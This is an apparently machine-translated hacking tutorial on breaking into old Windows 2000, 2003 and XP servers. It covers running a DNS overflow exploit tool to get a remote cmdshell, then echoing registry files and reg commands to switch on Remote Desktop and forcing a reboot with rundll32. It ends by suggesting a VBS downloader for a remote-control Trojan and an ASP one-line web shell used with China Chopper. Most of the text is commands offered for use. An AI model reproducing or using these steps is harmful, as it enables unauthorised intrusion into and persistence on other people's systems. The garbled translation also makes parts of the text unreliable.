1, Win7, Win2003, XP system
In the CMD command to open port 3389:
REG the ADD HKLM \ the SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server / v fDenyTSConnections / t REG_DWORD / d 00000000 / f
In the CMD command line closed 3389 (11111111 to 00000000 can be changed):
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
2,2000 System
A brief talk about how the DNS overflow attacks. Overflow exploit programs I use dns.exe, run it you can see information about its use parameters in CMD. After performing "dns -s IP" command to detect whether the target IP DNS overflow vulnerability exists, if there is overflow attacks, the implementation of "dns -t 2000all IP 1207" prompted to shell 1100 port we detect returned. "Telnet IP 1100" successfully get cmdshell returned. Note directory is c: / WINNT / system32, and then we need to do is to use the "echo" command to write a 3389.reg registry file. Press Enter the following code will be copied to the line by line execution window cmdshell:
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
Briefly explain, ">" symbol is overwritten files, the absence of such a file is created, there is the original content is overwritten. ">>" additional writing is that the content is written back in the original contents of the file on. Here is what was written to 3389.reg file! Note that the second line, that role is to write one line space, because the .reg file format must be so! After successful completion of the write operation is then performed import, perform "regedit / s 3389.reg". Such a registry file has been successfully imported into the registry gone. But note that not mistype any character in cmdshell, you can not perform, it is recommended to lay himself on the notepad, then copy it to ensure the implementation of cmdshell window after correct. You can then use the following method to restart the target host. Performed under the following code cmdshell:
@ECHO OFF & cd/d %temp% & echo [version] > {out}.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> {out}.inf
echo [defaultinstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%/{out}.inf r
The above five lines sequentially line by line to the cmdshell copied, copied by a carriage return line after the execution of the five elements were completed, the server will restart. Of course, make more server restart methods, such as off the end of the system key processes, code keys, etc. can all be simulated, such as no accident, then connect the target discovery Remote Desktop Services has successfully opened up after waiting for a server reboot. Open Remote Desktop Services under cmdshell return to this point after the Windows 2000 operating system overflow successfully completed.
System 3, 2003
With respect to the 2000 system, open Remote Desktop Services under 2003cmdshell some of the easier, at least, without having to restart it! The first method is to write a file 3389.reg "echo" command, then "regedit / s 3389.reg" Import registry file to open, is simple and similar to the above described method of opening 2000. Press Enter the following code will be copied to the line by line execution window cmdshell:
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
After the completion of the above operation is performed "regedit / s 3389.reg" Import to take effect! However, this method is relatively trouble. We can also use another simple way to open the Remote Desktop Services. Before introducing another method of operation, let's take a familiar Remote Desktop Services under the 2003 system at one of the most critical registry keys.
In "HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server"
Values under the name of "fDenyTSConnections" This one can see its value data is 1 or 0. A value of 1 when closed Remote Desktop service, a value of 0 when open Remote Desktop Services. In other words, as long as we can change the critical registry key data in cmdshell can achieve the purposes of the open Remote Desktop Services! Fortunately, there is a "reg" command can do this in 2003 under. Here we find a 2003 server operating system, and by the same method described above cmdshell return after a spill. When we try to connect you will find impossible to connect up. The following elaborate open Remote Desktop Services with the "reg" command. carried out:
reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"
We found "fDenyTSConnections" key data "0x1". This is a hexadecimal number 1. As mentioned above, the data is not open to a Remote Desktop Services. We have to do is to "0x1" changed to "0x0"! Directly "reg add" is not enough, you must delete the original key value add! Executed in cmdshell:
reg delete "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections
It asks whether "you want to delete the registry value fDenyTSConnections" Yes of course. Then execute:
reg add "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
Tips operation completed successfully. This put "fDenyTSConnections" the value to "0x0", and we can perform:
reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"
Discovery has successfully changed data. Now connect to the server to see 3389 again, discoveries have successfully connected, the user create a play. So far under the 2003 method cmdshell open Remote Desktop Services also introduced over.
After the spill does not necessarily have to be open Remote Desktop Services in cmdshell.
You can echo a vbs file to download Trojan remote control, and then run the Trojan to connect in cmdshell years.
There is a query whether the target IP bindings have a website, if you find a site directory, and then echo the Trojans into a word (for example: echo "<% execute request ( " cmd ")%>"> WEB path / test. asp), connected with a kitchen knife, then upload Malaysia, 3389 upload tool on again required.